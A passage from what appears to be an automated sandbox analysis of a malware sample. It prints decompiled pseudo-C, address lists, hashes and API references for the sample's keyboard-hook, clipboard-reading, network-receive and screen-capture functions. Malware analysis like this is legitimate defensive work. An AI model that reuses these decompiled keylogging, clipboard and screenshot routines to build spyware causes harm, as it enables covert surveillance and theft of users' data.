									E004451D9(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E0042F3BB(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}

0x004451de
0x004451df
0x004451e2
0x004451e2
0x004451e5
0x004451e5
0x004451e7
0x004451e8
0x004451f1
0x004451f2
0x004451f5
0x004451f8
0x004451fd
0x00445204
0x00445205
0x00445206
0x00445209
0x00445213
0x00445216
0x00445217
0x00445219
0x0044522d
0x0044522d
0x00445230
0x0044523a
0x0044523f
0x00445242
0x00445244
0x00000000
0x00445246
0x0044524a
0x00445253
0x00445259
0x00000000
0x0044525c
0x0044521b
0x0044521b
0x00445221
0x00445226
0x00445229
0x0044522b
0x00445262
0x00445264
0x00445265
0x00445266
0x00445267
0x00445268
0x00445269
0x0044526e
0x00445272
0x00445274
0x0044527a
0x00445281
0x00445284
0x00445287
0x00445288
0x0044528b
0x0044528c
0x0044528f
0x00445290
0x004452b1
0x004452b1
0x004452b3
0x00000000
0x00000000
0x00445298
0x0044529a
0x0044529c
0x0044529e
0x004452a0
0x004452a2
0x004452a4
0x004452af
0x00000000
0x004452af
0x004452a4
0x004452a0
0x00000000
0x0044529c
0x004452b5
0x004452b7
0x004452ba
0x004452d3
0x004452d3
0x004452d5
0x004452d8
0x004452e8
0x004452ea
0x004452ea
0x004452da
0x004452da
0x004452dd
0x00000000
0x004452df
0x004452df
0x004452e2
0x00000000
0x004452e4
0x004452e4
0x004452e4
0x004452e2
0x004452dd
0x004452f0
0x004452f8
0x004452fc
0x0044530a
0x0044530f
0x00445324
0x00445326
0x0044532c
0x0044532f
0x00445361
0x00445361
0x00445363
0x00445366
0x0044536c
0x0044536c
0x00445373
0x0044538d
0x0044538d
0x0044539c
0x004453a1
0x004453a4
0x004453a6
0x00000000
0x00000000
0x00000000
0x00000000
0x00445375
0x00445375
0x0044537b
0x0044537d
0x00000000
0x0044537f
0x0044537f
0x00445382
0x00000000
0x00445384
0x00445384
0x0044538b
0x00000000
0x00000000
0x00000000
0x00000000
0x0044538b
0x00445382
0x0044537d
0x00000000
0x004453a8
0x004453b0
0x004453b6
0x004453b8
0x004453b8
0x004453c0
0x004453c5
0x004453cd
0x004453d0
0x004453d2
0x004453e6
0x004453eb
0x00445331
0x00445331
0x00445335
0x0044533d
0x0044533d
0x0044533d
0x0044533f
0x00445342
0x00445345
0x00445345
0x004452bc
0x004452bf
0x004452c1
0x00000000
0x004452c3
0x004452c3
0x004452c9
0x004452ce
0x004452c1
0x00445352
0x0044535d
0x00000000
0x00000000
0x00000000
0x0044522b
0x004451ff
0x00445201
0x0044525d
0x00445261
0x00445261
0x00000000

Strings

., xrefs: 0044536C
\^)|/, xrefs: 0044527A

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: .$\^)|/
API String ID: 0-1462105608
Opcode ID: 8122091c18e79d286f3879f5c12825b3e654727c3f7d667a07e5a555ca567d5c
Instruction ID: 2556a3e9a53bead9c2cc6089577c7f4d879c8293429eeeef38aec714b9f8ac54
Opcode Fuzzy Hash: 8122091c18e79d286f3879f5c12825b3e654727c3f7d667a07e5a555ca567d5c
Instruction Fuzzy Hash: 1B313771900609AFEF248E79CC84EEB7BBDEB85304F1401AEF919D7252E6B49D448B54

Uniqueness

Uniqueness Score: -1.00%

Function 004083AE, Relevance: 4.6, APIs: 3, Instructions: 63keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000014), ref: 00408405
GetKeyState.USER32(00000014), ref: 0040840E
CallNextHookEx.USER32 ref: 0040844B

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: State$CallHookNext
String ID:
API String ID: 3691737146-0
Opcode ID: 4d3d5eac8624735368d490eca6ec4c64d5688b245544de068c1a01a534259ce4
Instruction ID: 20539ebaf702e89b65faa0330d2cd31ab800acc356ec291180b13426bfb37a2d
Opcode Fuzzy Hash: 4d3d5eac8624735368d490eca6ec4c64d5688b245544de068c1a01a534259ce4
Instruction Fuzzy Hash: BC110132100216AADF117F798D85B6A3A54AB82314F44907FF9813B2D7DEBD8C4483AE

Uniqueness

Uniqueness Score: -1.00%

Function 0042DC88, Relevance: 4.5, APIs: 3, Instructions: 33encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042DA3F,00000024,?,00000000,?), ref: 0042DC9D
CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042DA3F,00000024,?,00000000,?,?,?,?,?,?,?,00428261), ref: 0042DCB2
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042DA3F,00000024,?,00000000,?,?,?,?,?,?,?,00428261,?), ref: 0042DCC4

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 5319e8526ca9981c8c78e74b69d2b420cba3710fdbf78039c81efc3cd1e0f248
Instruction ID: a653b2b090d6dcaaaee73baf7dfa8f584202797538a4b58b6735b9bc9a9f202d
Opcode Fuzzy Hash: 5319e8526ca9981c8c78e74b69d2b420cba3710fdbf78039c81efc3cd1e0f248
Instruction Fuzzy Hash: 80F03035304220BAFB301E16EE05F573F58DB82B65FA00136F305951E1D5A29401D55C

Uniqueness

Uniqueness Score: -1.00%

Function 00409900, Relevance: 4.5, APIs: 3, Instructions: 22clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 00409906
GetClipboardData.USER32 ref: 00409912
CloseClipboard.USER32(?,00409998,00408AF9,?,00000000,00000000,?,?,?,?,?,?,?,00408AF9,00000001,00000000), ref: 0040991A

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: 6de17b5c62a90b2c7999133ce7a114c48b768ef6ad8bccae009c84f1cf96ffc3
Instruction ID: 8fbf22f638a55cef905a782357b3eb0fc726de02004506dbef09c7061627bc66
Opcode Fuzzy Hash: 6de17b5c62a90b2c7999133ce7a114c48b768ef6ad8bccae009c84f1cf96ffc3
Instruction Fuzzy Hash: 7DE04F7134131467C6146BB19909BAB7B54DB19B93F00403BBD09A6393C6B8DC0086D8

Uniqueness

Uniqueness Score: -1.00%

Function 00448C73, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00440492: GetLastError.KERNEL32(?,?,00434BF5,?,00000000,?,004362D0,?,00000000,?,00000000), ref: 00440496
Part of subcall function 00440492: _free.LIBCMT ref: 004404C9
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0044050A
Part of subcall function 00440492: _abort.LIBCMT ref: 00440510

Part of subcall function 00440492: _free.LIBCMT ref: 004404F1
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 004404FE

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00448CC7

Strings

\^)|/, xrefs: 00448C7E

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID: \^)|/
API String ID: 1663032902-265608074
Opcode ID: c91b4d03e06bda392f1b5b9fb73cb3d20095ed40bb629caf4f96681949f72ce4
Instruction ID: 5662a7d488445f3c016dd567d43ce08ebdf093f33f0dca6cffe2e479ac8604d7
Opcode Fuzzy Hash: c91b4d03e06bda392f1b5b9fb73cb3d20095ed40bb629caf4f96681949f72ce4
Instruction Fuzzy Hash: C121B37291120AABFB249A25DC42BBF73A8EF14314F10407FED01C6682EF789D41C759

Uniqueness

Uniqueness Score: -1.00%

Function 00440681, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 0043D88E: EnterCriticalSection.KERNEL32(-0046A510,?,0043B24F,00000000,00467120,0000000C,0043B20A,00000000,?,?,0043DB2C,00000000,?,00440547,00000001,00000364), ref: 0043D89D

EnumSystemLocalesW.KERNEL32(0044063B,00000001,004672C8,0000000C), ref: 004406B9

Strings

\^)|/, xrefs: 004406C1

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID: \^)|/
API String ID: 1272433827-265608074
Opcode ID: 5dd925c677c7fe59fa0b1e73affbcf870bf3f62cc76032ef0a712324064a17db
Instruction ID: ecc8bdf079c5c870da6aef4a9b68a8dc7679aec9dd2546d9ad809f5d5d7280cf
Opcode Fuzzy Hash: 5dd925c677c7fe59fa0b1e73affbcf870bf3f62cc76032ef0a712324064a17db
Instruction Fuzzy Hash: 25F0A432610200EFDB00EF68D842B4D77F0EB05329F10917BF910DB191D7B989508F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042F055, Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042F06E

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 148ffb12fde18d2d1e0a75b0d3425f7c89bae615eb643ca5c8966a935a83626e
Instruction ID: daa7d7bffc9a8bf71b960f5c1cba2cb2980b6b1ad428f88ea3bb53b3774dfe26
Opcode Fuzzy Hash: 148ffb12fde18d2d1e0a75b0d3425f7c89bae615eb643ca5c8966a935a83626e
Instruction Fuzzy Hash: A3418D71A00215DBDB14CFA9E88676ABBF8FB04310F90857BD405E7250E7B89D64CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004488FB, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00440492: GetLastError.KERNEL32(?,?,00434BF5,?,00000000,?,004362D0,?,00000000,?,00000000), ref: 00440496
Part of subcall function 00440492: _free.LIBCMT ref: 004404C9
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0044050A
Part of subcall function 00440492: _abort.LIBCMT ref: 00440510

EnumSystemLocalesW.KERNEL32(00448A23,00000001,00000000,?,0043CC9E,?,00449050,00000000,?,?,?), ref: 0044896D

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 325f4b2101dd8981e9bf6093ded2a4979d83c2c797e927ef0d7784d4674f8bd5
Instruction ID: 9d38f1ada77d4f407565882b9830f34e7f6f01d3850e3fd94fda13d32a3e870f
Opcode Fuzzy Hash: 325f4b2101dd8981e9bf6093ded2a4979d83c2c797e927ef0d7784d4674f8bd5
Instruction Fuzzy Hash: 89112577204B015FEB189F39D8916BEB791FF80358B19442EEA8687B40DB79A902C744

Uniqueness

Uniqueness Score: -1.00%

Function 00448EA3, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00440492: GetLastError.KERNEL32(?,?,00434BF5,?,00000000,?,004362D0,?,00000000,?,00000000), ref: 00440496
Part of subcall function 00440492: _free.LIBCMT ref: 004404C9
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0044050A
Part of subcall function 00440492: _abort.LIBCMT ref: 00440510

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00448C41,00000000,00000000,?), ref: 00448ECF

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 825541287377f4b00213e6effe4c1837f0fe94f0aa31d822bb7da42e67875fb1
Instruction ID: 372ebd8739dce16893a4691895ddae38312fd639fc96c08ed19f94d62c2a39fc
Opcode Fuzzy Hash: 825541287377f4b00213e6effe4c1837f0fe94f0aa31d822bb7da42e67875fb1
Instruction Fuzzy Hash: F4F0F932A00116BFFB289A258C057BF7798EB40714F14446EEE06E3640EE78FD55C694

Uniqueness

Uniqueness Score: -1.00%

Function 00448996, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00440492: GetLastError.KERNEL32(?,?,00434BF5,?,00000000,?,004362D0,?,00000000,?,00000000), ref: 00440496
Part of subcall function 00440492: _free.LIBCMT ref: 004404C9
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0044050A
Part of subcall function 00440492: _abort.LIBCMT ref: 00440510

EnumSystemLocalesW.KERNEL32(00448C73,00000001,?,?,0043CC9E,?,00449014,0043CC9E,?,?,?,?,?,0043CC9E,?,?), ref: 004489E2

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 8d7ef1193c9837f4850028f1b0cc6e354b867eddafc5414fdf18bb9277d52941
Instruction ID: 74c3fb681197112fd6fb55df2a70e6bdb48f6cc455b79b1aff0555476c9906da
Opcode Fuzzy Hash: 8d7ef1193c9837f4850028f1b0cc6e354b867eddafc5414fdf18bb9277d52941
Instruction Fuzzy Hash: 3AF02272200B042FEB189F398881A7BBB94FF81368B04843EFA418BA41DBB59C018648

Uniqueness

Uniqueness Score: -1.00%

Function 004488B0, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00440492: GetLastError.KERNEL32(?,?,00434BF5,?,00000000,?,004362D0,?,00000000,?,00000000), ref: 00440496
Part of subcall function 00440492: _free.LIBCMT ref: 004404C9
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0044050A
Part of subcall function 00440492: _abort.LIBCMT ref: 00440510

EnumSystemLocalesW.KERNEL32(00448807,00000001,?,?,?,00449072,0043CC9E,?,?,?,?,?,0043CC9E,?,?,?), ref: 004488E7

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 9ba7c8faedd657483faf41362396b780c9dd45356192bda100e58818e8b71031
Instruction ID: 6e12aa6cec09c68902f0bb43679e053dd1ec4cf3da3bd186641749059478eeb6
Opcode Fuzzy Hash: 9ba7c8faedd657483faf41362396b780c9dd45356192bda100e58818e8b71031
Instruction Fuzzy Hash: 4CF0553670024557EB04BF39C809A6BBF90EFC2718B4A406EEB058BA41CB799842C798

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3AD, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00411746,0046B218,0046B594,0046B218,00000000,0046B218,00000000,0046B218,3.1.0 Pro), ref: 0040D3C1

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: abcea1df2711ab815d782a3d2777a9795f8753c0f4eb77dc750212f917e185e8
Instruction ID: 273245cf55db8169485638c594d8623d71067936fd35abc93a2baa6c7f62b112
Opcode Fuzzy Hash: abcea1df2711ab815d782a3d2777a9795f8753c0f4eb77dc750212f917e185e8
Instruction Fuzzy Hash: 90D05B7074121C77D51496959D0AEAA7B9CD701B52F0001A6BA04D72C1D9E05E0087E1

Uniqueness

Uniqueness Score: -1.00%

Function 004081EF, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 004081F4

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: KeyboardLayout
String ID:
API String ID: 194098044-0
Opcode ID: d744dc9e4d087d506e521249fc77391539e469dcc9cfa59ae4c5fd823a0bf1ea
Instruction ID: 2c8c00f7cf8fe531df2d113631ab07878f56d1509be5aaeff7f7c320de9e026e
Opcode Fuzzy Hash: d744dc9e4d087d506e521249fc77391539e469dcc9cfa59ae4c5fd823a0bf1ea
Instruction Fuzzy Hash: 79D02233A80B301EE73862287D067A22680D7D0B20F8588BFFAC04A0D4C8EA88C3018C

Uniqueness

Uniqueness Score: -1.00%

Function 0042190F, Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 0042191A

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 5ef3c6516578ebf9486557a8372985aa1032d1b0b877672602ae95b773f808b2
Instruction ID: 070dd796d1b0ca3d4707aeee791523d78119814ed4c11486951e5192ec09d5c0
Opcode Fuzzy Hash: 5ef3c6516578ebf9486557a8372985aa1032d1b0b877672602ae95b773f808b2
Instruction Fuzzy Hash: 5BC02B3500430CBFDF000F90CD08C793F6DD7493207008025F90205151C577C4609BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042EF77, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002EF83,0042EC66), ref: 0042EF7C

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1470c03ed186eb23f721642618270514759ec5bbe31a8c03c9216d96e45b8a18
Instruction ID: c07da826754cbd9f8a065467bfc74e836c38dd6d0faa56343da9074d5081d247
Opcode Fuzzy Hash: 1470c03ed186eb23f721642618270514759ec5bbe31a8c03c9216d96e45b8a18
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004464AD, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 004464AD

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 402226844a25ed0ccd1962e481d12894c56aac7d7613bdd422f2ee7af18a3609
Instruction ID: 5ba0c33bf86985cc8a65cddc3594053c55753a432b63fc4a05055fe391c87f78
Opcode Fuzzy Hash: 402226844a25ed0ccd1962e481d12894c56aac7d7613bdd422f2ee7af18a3609
Instruction Fuzzy Hash: 8AA01130200B008B83008F32AB0820E3AA8AA0A282300803AA000C0A20EAB088A0CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 0041437F, Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 298
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041437F(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = L004147B6( *((intOrPtr*)(0x46ad70 + _a4 * 4)));
				_t114 = L00414802( *((intOrPtr*)(0x46ad70 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							L00414843( *((intOrPtr*)(0x46ad70 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E0040201F(_t194,  &_v80);
												E0040201F(_t194,  &_v168);
												E00402467(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E004050FE( &_v80);
												E00402467(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E004050FE( &_v80);
												_t235 = _a4;
												E00402467(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E004050FE( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												L00401F8E(_t194, _t194, __eflags,  &_v168);
												L00401F11();
												L00401F11();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					L00401FCE(_t194, _t194, 0x45e65c);
					L32:
					return _t194;
				}
			}

0x0041438d
0x00414398
0x004143a0
0x004143a3
0x004143af
0x004143b1
0x004143c0
0x004143cd
0x004143d2
0x004143d5
0x004143da
0x004143f4
0x004143fa
0x004143fd
0x004143ff
0x00414419
0x0041441f
0x00414421
0x0041443a
0x0041443e
0x00414449
0x00414469
0x0041446f
0x00414471
0x00000000
0x00000000
0x00414473
0x00414477
0x0041447c
0x00414484
0x0041448a
0x0041448c
0x00414498
0x0041449e
0x004144a0
0x004144ba
0x004144ba
0x004144bd
0x004144c6
0x004144d1
0x004144d5
0x004144db
0x004144db
0x004144a0
0x0041448c
0x004144e1
0x004144e4
0x004144e9
0x004144ef
0x004144f1
0x00000000
0x004144f7
0x004144fe
0x00414504
0x00414507
0x0041450d
0x0041450f
0x00414510
0x00414513
0x00414516
0x00414543
0x00414543
0x0041454c
0x0041454d
0x00414555
0x00414559
0x0041455a
0x00414563
0x00414569
0x00414570
0x00414578
0x0041457c
0x0041457f
0x00414582
0x00414589
0x0041458b
0x0041458b
0x00414597
0x0041459b
0x0041459f
0x004145a0
0x004145ae
0x004145b5
0x004145b8
0x004145be
0x004145c1
0x004145c3
0x004145dc
0x004145e2
0x004145e4
0x00414611
0x00414625
0x0041462a
0x00414635
0x00414635
0x0041463b
0x0041463e
0x00414649
0x00414657
0x00414666
0x00414671
0x00414680
0x00414688
0x0041468f
0x0041469e
0x004146a6
0x004146ad
0x004146bc
0x004146bf
0x004146ca
0x004146d5
0x004146dd
0x00000000
0x004146dd
0x004145ef
0x004145f2
0x004145f7
0x00414601
0x00000000
0x004145c5
0x004145c5
0x00414424
0x0041442a
0x0041442d
0x0041442f
0x00000000
0x0041442f
0x004145c3
0x00414518
0x0041451a
0x0041451b
0x0041451e
0x00414521
0x00000000
0x00000000
0x00414523
0x00414525
0x00414526
0x00414529
0x0041452c
0x00000000
0x00000000
0x00414530
0x00414531
0x00414534
0x0041453d
0x0041453f
0x00414540
0x00414540
0x00000000
0x00414540
0x00414536
0x00414539
0x00000000
0x00414539
0x00000000
0x00414509
0x004144f1
0x00414423
0x00414423
0x00000000
0x00414401
0x00414408
0x0041440b
0x0041440d
0x0041440f
0x0041440f
0x00000000
0x0041440f
0x004143e0
0x004143e0
0x004143e7
0x004146e4
0x004146ea
0x004146ea

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0041439A
CreateCompatibleDC.GDI32(00000000), ref: 004143A6

Part of subcall function 004147B6: GetMonitorInfoW.USER32(?,?), ref: 004147D6

Part of subcall function 00414802: GetMonitorInfoW.USER32(?,?), ref: 00414822

